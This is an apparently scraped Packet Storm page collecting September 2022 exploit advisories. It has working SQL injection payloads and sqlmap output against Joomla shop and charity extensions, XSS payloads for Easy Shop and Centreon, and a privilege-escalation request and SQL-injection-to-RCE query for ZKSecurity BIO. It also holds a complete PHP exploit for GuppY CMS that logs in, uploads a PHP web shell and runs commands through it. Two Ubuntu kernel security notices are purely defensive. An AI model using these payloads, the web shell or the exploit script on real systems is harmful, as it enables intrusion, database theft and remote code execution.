Joomla JKassa ShoppingCart extension version 2.0.0 suffers from a remote SQL injection vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                      [ Exploits ]                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : extensions.joomla.org                                                      ││  Vendor   : GeneticsPro - jkassa.com                                                   ││  Software : Joomla JKassa ShoppingCart 2.0.0                                           ││  Vuln Type: SQL Injection                                                              ││  Method   : GET                                                                        ││  Impact   : Database Access                                                            ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                              B4nks-NET irc.b4nks.tk #unix                             ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  Typically used for remotely exploitable vulnerabilities that can lead to              ││  system compromise                                                                     ││                                                                                        ││                                                                                        ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/CryptozJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2022                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /shop/men/sweatshirts.feedGET parameter 'manufacturer' is vulnerable---Parameter: manufacturer (GET)    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: min_cost=25.6&max_cost=67.74&manufacturer=null) AND (SELECT 8420 FROM (SELECT(SLEEP(5)))bIVQ) AND (1590=1590&attribute=null&_=1664646035244&type=atom---[+] Starting the Attack[INFO] the back-end DBMS is MySQLweb application technology: Nginx, PHP 7.4.16back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)current database: 'jkassa_umarket'[-] Done

Joomla JKassa ShoppingCart 2.0.0 SQL Injection

Joomla Easy Shop extension version 1.4.1 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                      [ Exploits ]                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : extensions.joomla.org                                                      ││  Vendor   : JoomTech - joomtech.net                                                    ││  Software : Joomla Easy Shop 1.4.1                                                     ││  Vuln Type: Reflected XSS                                                              ││  Method   : GET                                                                        ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                              B4nks-NET irc.b4nks.tk #unix                             ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/CryptozJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2022                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path:/supermarket/index.phpGET parameter 'file' is vulnerable to XSShttps://demo.joomtech.net/supermarket/index.php?option=com_easyshop&task=ajax.loadImage&file=YXNzZXRzL2ltYWdlcy91c2VyX2N1c3RvbWVycy81NjMvYmFubmVyMi5qcGdzcW9obDxpbWcgc3JjPWEgb25lcnJvcj1hbGVydCgxKT5peG1kYw%3d%3d&size=medium[-] Done

Joomla Easy Shop 1.4.1 Cross Site Scripting

Joomla JUX Charity Hub extension version 1.0.4 suffers from a remote SQL injection vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                      [ Exploits ]                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : extensions.joomla.org                                                      ││  Vendor   : JoomlaUX - joomlaux.com                                                    ││  Software : JUX Charity Hub 1.0.4 Extension for Joomla                                 ││  Vuln Type: SQL Injection                                                              ││  Method   : GET                                                                        ││  Impact   : Database Access                                                            ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                              B4nks-NET irc.b4nks.tk #unix                             ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  Typically used for remotely exploitable vulnerabilities that can lead to              ││  system compromise                                                                     ││                                                                                        ││                                                                                        ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/CryptozJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2022                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /extensions/charityhub/index.php/causes/grid-causes/grid-causes-no-sidebar/causesGET parameter 'title' is vulnerable---Parameter: title (GET)    Type: boolean-based blind    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)    Payload: option=com_jux_charity_hub&view=causes&list_style=grid&Itemid=107&title=-7388' OR 2114=2114#&goal_slider_lower=3000&goal_slider_upper=900000&c_id=10&donated_status=0&country_id=223&jform[locstate]=17&published_up=&published_down=&button=Search    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)    Payload: option=com_jux_charity_hub&view=causes&list_style=grid&Itemid=107&title=1' AND (SELECT 4175 FROM(SELECT COUNT(*),CONCAT(0x71707a7871,(SELECT (ELT(4175=4175,1))),0x717a626b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- GUzX&goal_slider_lower=3000&goal_slider_upper=900000&c_id=10&donated_status=0&country_id=223&jform[locstate]=17&published_up=&published_down=&button=Search    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: option=com_jux_charity_hub&view=causes&list_style=grid&Itemid=107&title=1' AND (SELECT 8556 FROM (SELECT(SLEEP(5)))SnfZ)-- awOv&goal_slider_lower=3000&goal_slider_upper=900000&c_id=10&donated_status=0&country_id=223&jform[locstate]=17&published_up=&published_down=&button=Search---[+] Starting the Attack[INFO] the back-end DBMS is MySQLweb application technology: PHP 7.3.19back-end DBMS: MySQL >= 5.0 (MariaDB fork)[INFO] fetching current databasecurrent database: 'joomlaux_charityhub2'[-] Done

Joomla JUX Charity Hub 1.0.4 SQL Injection

This archive contains all of the 118 exploits added to Packet Storm in September, 2022.

Packet Storm New Exploits For September, 2022

Ubuntu Security Notice 5650-1 - It was discovered that the framebuffer driver on the Linux kernel did not verify size limits when changing font or screen size, leading to an out-of- bounds write. A local attacker could use this to cause a denial of service or possibly execute arbitrary code. It was discovered that the virtual terminal driver in the Linux kernel did not properly handle VGA console font changes, leading to an out-of-bounds write. A local attacker could use this to cause a denial of service or possibly execute arbitrary code.

==========================================================================  
Ubuntu Security Notice USN-5650-1  
September 30, 2022

linux, linux-aws, linux-kvm, linux-lts-xenial vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 16.04 ESM  
- Ubuntu 14.04 ESM

Summary:

Several security issues were fixed in the Linux kernel.

Software Description:  
- linux: Linux kernel  
- linux-aws: Linux kernel for Amazon Web Services (AWS) systems  
- linux-kvm: Linux kernel for cloud environments  
- linux-lts-xenial: Linux hardware enablement kernel from Xenial for Trusty

Details:

It was discovered that the framebuffer driver on the Linux kernel did not  
verify size limits when changing font or screen size, leading to an out-of-  
bounds write. A local attacker could use this to cause a denial of service  
(system crash) or possibly execute arbitrary code. (CVE-2021-33655)

It was discovered that the virtual terminal driver in the Linux kernel did  
not properly handle VGA console font changes, leading to an out-of-bounds  
write. A local attacker could use this to cause a denial of service (system  
crash) or possibly execute arbitrary code. (CVE-2021-33656)

Christian Brauner discovered that the XFS file system implementation in the  
Linux kernel did not properly handle setgid file creation. A local attacker  
could use this to gain elevated privileges. (CVE-2021-4037)

It was discovered that the ext4 file system implementation in the Linux  
kernel did not properly initialize memory in some situations. A privileged  
local attacker could use this to expose sensitive information (kernel  
memory). (CVE-2022-0850)

Duoming Zhou discovered that the AX.25 amateur radio protocol  
implementation in the Linux kernel did not handle detach events properly in  
some situations. A local attacker could possibly use this to cause a denial  
of service (system crash) or execute arbitrary code. (CVE-2022-1199)

Duoming Zhou discovered race conditions in the AX.25 amateur radio protocol  
implementation in the Linux kernel during device detach operations. A local  
attacker could possibly use this to cause a denial of service (system  
crash). (CVE-2022-1204)

Norbert Slusarek discovered that a race condition existed in the perf  
subsystem in the Linux kernel, resulting in a use-after-free vulnerability.  
A privileged local attacker could use this to cause a denial of service  
(system crash) or possibly execute arbitrary code. (CVE-2022-1729)

It was discovered that the Packet network protocol implementation in the  
Linux kernel contained an out-of-bounds access. A remote attacker could use  
this to expose sensitive information (kernel memory). (CVE-2022-20368)

It was discovered that the Open vSwitch implementation in the Linux kernel  
contained an out of bounds write vulnerability in certain situations. A  
local attacker could use this to cause a denial of service (system crash)  
or possibly execute arbitrary code. (CVE-2022-2639)

Jann Horn discovered that the ASIX AX88179/178A USB Ethernet driver in the  
Linux kernel contained multiple out-of-bounds vulnerabilities. A local  
attacker with physical access could plug in a specially crafted USB device  
to cause a denial of service (system crash) or possibly execute arbitrary  
code. (CVE-2022-2964)

Hao Sun and Jiacheng Xu discovered that the NILFS file system  
implementation in the Linux kernel contained a use-after-free  
vulnerability. A local attacker could use this to cause a denial of service  
(system crash) or possibly execute arbitrary code. (CVE-2022-2978)

Abhishek Shah discovered a race condition in the PF_KEYv2 implementation in  
the Linux kernel. A local attacker could use this to cause a denial of  
service (system crash) or possibly expose sensitive information (kernel  
memory). (CVE-2022-3028)

It was discovered that the Journaled File System (JFS) in the Linux kernel  
contained a null pointer dereference in some situations. A local attacker  
could use this to cause a denial of service (system crash). (CVE-2022-3202)

Domingo Dirutigliano and Nicola Guerrera discovered that the netfilter  
subsystem in the Linux kernel did not properly handle rules that truncated  
packets below the packet header size. When such rules are in place, a  
remote attacker could possibly use this to cause a denial of service  
(system crash). (CVE-2022-36946)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 16.04 ESM:  
   linux-image-4.4.0-1114-kvm      4.4.0-1114.124  
   linux-image-4.4.0-1151-aws      4.4.0-1151.166  
   linux-image-4.4.0-234-generic   4.4.0-234.268  
   linux-image-4.4.0-234-lowlatency  4.4.0-234.268  
   linux-image-aws                 4.4.0.1151.155  
   linux-image-generic             4.4.0.234.240  
   linux-image-kvm                 4.4.0.1114.111  
   linux-image-lowlatency          4.4.0.234.240  
   linux-image-virtual             4.4.0.234.240

Ubuntu 14.04 ESM:  
   linux-image-4.4.0-1113-aws      4.4.0-1113.119  
   linux-image-4.4.0-234-generic   4.4.0-234.268~14.04.1  
   linux-image-4.4.0-234-lowlatency  4.4.0-234.268~14.04.1  
   linux-image-aws                 4.4.0.1113.110  
   linux-image-generic-lts-xenial  4.4.0.234.203  
   linux-image-lowlatency-lts-xenial  4.4.0.234.203  
   linux-image-virtual-lts-xenial  4.4.0.234.203

After a standard system update you need to reboot your computer to make  
all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have  
been given a new version number, which requires you to recompile and  
reinstall all third party kernel modules you might have installed.  
Unless you manually uninstalled the standard kernel metapackages  
(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,  
linux-powerpc), a standard system upgrade will automatically perform  
this as well.

References:  
   https://ubuntu.com/security/notices/USN-5650-1  
   CVE-2021-33655, CVE-2021-33656, CVE-2021-4037, CVE-2022-0850,  
   CVE-2022-1199, CVE-2022-1204, CVE-2022-1729, CVE-2022-20368,  
   CVE-2022-2639, CVE-2022-2964, CVE-2022-2978, CVE-2022-3028,  
   CVE-2022-3202, CVE-2022-36946

Ubuntu Security Notice USN-5650-1

Ubuntu Security Notice 5648-1 - It was discovered that the framebuffer driver on the Linux kernel did not verify size limits when changing font or screen size, leading to an out-of- bounds write. A local attacker could use this to cause a denial of service or possibly execute arbitrary code. Duoming Zhou discovered that race conditions existed in the timer handling implementation of the Linux kernel's Rose X.25 protocol layer, resulting in use-after-free vulnerabilities. A local attacker could use this to cause a denial of service.

==========================================================================  
Ubuntu Security Notice USN-5648-1  
September 30, 2022

linux-gke-5.15 vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 20.04 LTS

Summary:

Several security issues were fixed in the Linux kernel.

Software Description:  
- linux-gke-5.15: Linux kernel for Google Container Engine (GKE) systems

Details:

It was discovered that the framebuffer driver on the Linux kernel did not  
verify size limits when changing font or screen size, leading to an out-of-  
bounds write. A local attacker could use this to cause a denial of service  
(system crash) or possibly execute arbitrary code. (CVE-2021-33655)

Duoming Zhou discovered that race conditions existed in the timer handling  
implementation of the Linux kernel's Rose X.25 protocol layer, resulting in  
use-after-free vulnerabilities. A local attacker could use this to cause a  
denial of service (system crash). (CVE-2022-2318)

Roger Pau Monné discovered that the Xen virtual block driver in the Linux  
kernel did not properly initialize memory pages to be used for shared  
communication with the backend. A local attacker could use this to expose  
sensitive information (guest kernel memory). (CVE-2022-26365)

Roger Pau Monné discovered that the Xen paravirtualization frontend in the  
Linux kernel did not properly initialize memory pages to be used for shared  
communication with the backend. A local attacker could use this to expose  
sensitive information (guest kernel memory). (CVE-2022-33740)

It was discovered that the Xen paravirtualization frontend in the Linux  
kernel incorrectly shared unrelated data when communicating with certain  
backends. A local attacker could use this to cause a denial of service  
(guest crash) or expose sensitive information (guest kernel memory).  
(CVE-2022-33741, CVE-2022-33742)

Jan Beulich discovered that the Xen network device frontend driver in the  
Linux kernel incorrectly handled socket buffers (skb) references when  
communicating with certain backends. A local attacker could use this to  
cause a denial of service (guest crash). (CVE-2022-33743)

Oleksandr Tyshchenko discovered that the Xen paravirtualization platform in  
the Linux kernel on ARM platforms contained a race condition in certain  
situations. An attacker in a guest VM could use this to cause a denial of  
service in the host OS. (CVE-2022-33744)

It was discovered that the virtio RPMSG bus driver in the Linux kernel  
contained a double-free vulnerability in certain error conditions. A local  
attacker could possibly use this to cause a denial of service (system  
crash). (CVE-2022-34494, CVE-2022-34495)

Domingo Dirutigliano and Nicola Guerrera discovered that the netfilter  
subsystem in the Linux kernel did not properly handle rules that truncated  
packets below the packet header size. When such rules are in place, a  
remote attacker could possibly use this to cause a denial of service  
(system crash). (CVE-2022-36946)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 20.04 LTS:  
   linux-image-5.15.0-1016-gke     5.15.0-1016.19~20.04.1  
   linux-image-gke-5.15            5.15.0.1016.19~20.04.1

After a standard system update you need to reboot your computer to make  
all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have  
been given a new version number, which requires you to recompile and  
reinstall all third party kernel modules you might have installed.  
Unless you manually uninstalled the standard kernel metapackages  
(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,  
linux-powerpc), a standard system upgrade will automatically perform  
this as well.

References:  
   https://ubuntu.com/security/notices/USN-5648-1  
   CVE-2021-33655, CVE-2022-2318, CVE-2022-26365, CVE-2022-33740,  
   CVE-2022-33741, CVE-2022-33742, CVE-2022-33743, CVE-2022-33744,  
   CVE-2022-34494, CVE-2022-34495, CVE-2022-36946

Package Information:  
   https://launchpad.net/ubuntu/+source/linux-gke-5.15/5.15.0-1016.19~20.04.1

Ubuntu Security Notice USN-5648-1

ZKSecurity BIO version 3.0.5.0_R suffers from a privilege escalation vulnerability.

#######################ADVISORY INFORMATION#######################

Product: ZKSecurity BIO

Vendor: ZKTeco

Version Affected: 3.0.5.0_R

CVE: CVE-2022-36634

Vulnerability: User privilege escalation

#######################CREDIT#######################

This vulnerability was discovered and researched by Caio Burgardt and  
Silton Santos.

#######################INTRODUCTION#######################

Based on the hybrid biometric technology and computer vision technology,  
ZKBioSecurity provides a comprehensive web-based security platform. It  
contains multiple integrated modules: personnel, time & attendance, access  
control, visitor management, offline & online consumption management, guard  
patrol, parking, elevator control, entrance control, Facekiosk, intelligent  
video management, mask and temperature detection module, and other smart  
sub-systems.

#######################VULNERABILITY DETAILS#######################

The application's access control management does not check the session's  
permissions correctly. An attacker with "Person Self-Login" or "User"  
privilege can create a super user with full privileges in the application

#######################PROOF OF CONCEPT#######################

POST /authUserAction!edit.action HTTP/1.1

Host: {HOST}

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101  
Firefox/102.0

Accept:  
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Content-Type: multipart/form-data;  
boundary=---------------------------291763244192371568695079347

Content-Length: 1956

Origin: http://{HOST}:8088

Connection: close

Referer: http://{HOST}:8088/base_index.action

Cookie: <INSERT_LOW-PRIVILEGE_COOKIE_HERE>

Upgrade-Insecure-Requests: 1

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="authUser.username"

test_privesc

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="authUser.loginPwd"

KDla123

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="repassword"

KDla123

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="authUser.isActive"

true

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="authUser.isSuperuser"

true

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="groupIds"

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="deptIds"

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="areaIds"

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="authUser.email"

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="authUser.name"

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="authUser.lastName"

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="fingerTemplate"

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="fingerId"

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="logMethod"

add

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="un"

1657813612925_286

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="systemCode"

base

-----------------------------291763244192371568695079347--

#######################END#######################

ZKSecurity BIO 3.0.5.0_R Privilege Escalation

ZKSecurity BIO version 4.1.2 suffers from a remote SQL injection vulnerability that can allow for remote code execution.

    #######################ADVISORY INFORMATION#######################Product: ZKSecurity BIOVendor: ZKTeco (https://www.zkteco.com/en/ZKBiosecurity/ZKBioSecurity_V5000_4.1.2)Version Affected: 4.1.2CVE: CVE-2022-36635Vulnerability: SQL Injection (with a plus: RCE)#######################CREDIT#######################This vulnerability was discovered and researched by Caio Burgardt andSilton Santos.#######################INTRODUCTION#######################Based on the hybrid biometric technology and computer vision technology,ZKBioSecurity provides a comprehensive web-based security platform. Itcontains multiple integrated modules: personnel, time & attendance, accesscontrol, visitor management, offline & online consumption management, guardpatrol, parking, elevator control, entrance control, Facekiosk, intelligentvideo management, mask and temperature detection module, and other smartsub-systems.#######################VULNERABILITY DETAILS#######################The parameters opTimeBegin e opTimeEnd are simply concatenated to the SQLquery, with only a sanitization filter in front of it. Using comments(/**/) in place of spaces was enough to confuse and bypass the filter.#######################PROOF OF CONCEPT#######################Note that the request delayed 10s:POST /baseOpLog.do HTTP/1.1Host: {HOST}Content-Type: application/x-www-form-urlencodedCookie: SESSION={COOKIE}; menuType=icon-onlyContent-Length: 208list&pageSize=50&opTimeBegin=2022-06-26%2000:00:00')/**/tmp_count;select/**/pg_sleep(10);/**/select+1+from+BASE_OPLOG/**/WHERE/**/'1'='1&opTimeEnd=2022-09-26%2023:59:59&sortName=&sortOrder=&posStart=0&count=50if you use the next query, you can execute remote command:list&pageSize=50&opTimeBegin=2022-04-11%2000:00:00&opTimeEnd=2022-07-11%2023:59:59')/**/tmp_count;DROP/**/TABLE/**/IF/**/EXISTS/**/cmd_exec;CREATE/**/TABLE/**/cmd_exec/**/(cmd_output/**/text);COPY/**/cmd_exec/**/FROM/**/PROGRAM/**/'ping+domain';SELECT/**/*/**/FROM/**/cmd_exec;/**/SeLECT/**/count/**/(1)/**/fRom/**/(SeLECT/**/t.CREATE_TIME/**/fROM/**/BASE_OPLOG/**/t/**/where/**/'1'='#######################END#######################

ZKSecurity BIO 4.1.2 SQL Injection / Code Execution

Centreon version 22.04.0 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Stored XSS in service_alias parameter in Centreon version 22.04.0# Date: 1/10/2022# Exploit Author: syad# Vendor Homepage: Centreon# Software Link: https://download.centreon.com/# Version: 22.04.0# CVE ID : CVE-2022-39988# Tested on: Centos 7Centreon 22.04.0 is vulnerable to Stored Cross Site Scripting (XSS) from the function Service -> Templates -> by adding a crafted payloadinto the service_alias parameter.go to this endpoint -> /centreon/main.get.php?p=60206 -> Service -> Templates -> Click Button "Add" and put the crafted payload below on section "Alias" and savepayload --> test"><body onload=prompt('XSS-STORED')>

Centreon 22.04.0 Cross Site Scripting

GuppY CMS version 6.00.10 suffers from an authenticated remote shell upload vulnerability.

    # Exploit Title: GuppY 6.00.10 CMS Remote Code Execution# Date: Sep 30, 2022# Exploit Author: Chokri Hammedi# Vendor Homepage: https://www.freeguppy.org/# Software Link:https://www.freeguppy.org/fgy6dn.php?lng=en&pg=279927&tconfig=0#z2# Version: 6.00.10# Tested on: Linux#!/usr/bin/php<?php$username = "Admin"; //Administrator username$password = "rose1337"; //Administrator password$options = getopt('u:c:');if(!isset($options['u'], $options['c']))die("\n GuppY 6.00.10 CMS Remote Code Execution \n Author: Chokri Hammedi\n \n Usage : php exploit.php -u http://target.org/ -c whoami\n\n\n");$target     =  $options['u'];$command    =  $options['c'];// Administrator login$cookie="cookie.txt";$url = "{$target}guppy/connect.php";$postdata = "connect=on&uuser=old&pseudo=".$username."&uid=".$password;$curlObj = curl_init();curl_setopt($curlObj, CURLOPT_URL, $url);curl_setopt($curlObj, CURLOPT_RETURNTRANSFER, 1);curl_setopt($curlObj, CURLOPT_HEADER, 1);curl_setopt($curlObj, CURLOPT_SSL_VERIFYPEER, false);curl_setopt ($curlObj, CURLOPT_POSTFIELDS, $postdata);curl_setopt ($curlObj, CURLOPT_POST, 1);CURL_setopt($curlObj,CURLOPT_RETURNTRANSFER,True);CURL_setopt($curlObj,CURLOPT_FOLLOWLOCATION,True);CURL_SETOPT($curlObj,CURLOPT_CONNECTTIMEOUT,30);CURL_SETOPT($curlObj,CURLOPT_TIMEOUT,30);curl_setopt($curlObj,CURLOPT_COOKIEFILE, "$cookie");curl_setopt($curlObj, CURLOPT_COOKIEJAR, "$cookie");$result = curl_exec($curlObj);// uploading shell$url2 = "{$target}guppy/admin/admin.php?lng=en&pg=upload";$post='------WebKitFormBoundarygA1APFcUlkIaWal4Content-Disposition: form-data; name="rep"file------WebKitFormBoundarygA1APFcUlkIaWal4Content-Disposition: form-data; name="ficup"; filename="shell.php"Content-Type: application/x-php<?php system($_GET["cmd"]); ?>------WebKitFormBoundarygA1APFcUlkIaWal4--';$headers = array(            'Content-Type: multipart/form-data;boundary=----WebKitFormBoundarygA1APFcUlkIaWal4',            'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36',            'Accept-Encoding: gzip, deflate',            'Accept-Language: en-US,en;q=0.9');curl_setopt($curlObj, CURLOPT_HTTPHEADER, $headers);curl_setopt($curlObj, CURLOPT_URL, $url2);curl_setopt($curlObj, CURLOPT_POSTFIELDS, $post);curl_setopt($curlObj, CURLOPT_POST, true);curl_setopt($curlObj, CURLOPT_SSL_VERIFYPEER, false);CURL_setopt($curlObj,CURLOPT_RETURNTRANSFER,True);CURL_setopt($curlObj,CURLOPT_FOLLOWLOCATION,True);CURL_SETOPT($curlObj,CURLOPT_CONNECTTIMEOUT,30);CURL_SETOPT($curlObj,CURLOPT_TIMEOUT,30);curl_setopt($curlObj,CURLOPT_COOKIEFILE, "$cookie");curl_setopt($curlObj, CURLOPT_COOKIEJAR, "$cookie");$data = curl_exec($curlObj);// Executing the shell$shell = "{$target}guppy/file/shell.php?cmd=" .$command;curl_setopt($curlObj, CURLOPT_URL, $shell);curl_setopt($curlObj, CURLOPT_HTTPHEADER, array('Content-Type:application/x-www-form-urlencoded'));curl_setopt($curlObj, CURLOPT_SSL_VERIFYPEER, False);CURL_setopt($curlObj,CURLOPT_RETURNTRANSFER,True);curl_setopt($curlObj, CURLOPT_HEADER, False);curl_setopt($curlObj, CURLOPT_POST, false);$exec_shell = curl_exec($curlObj);$code = curl_getinfo($curlObj, CURLINFO_HTTP_CODE);if($code != 200) {    echo "\n\n \e[5m\033[31m[-]Something went wrong! \n [-]Please check thecredentials\n";}else {print("\n");print($exec_shell);}curl_close($curlObj);?>

Source

Packet Storm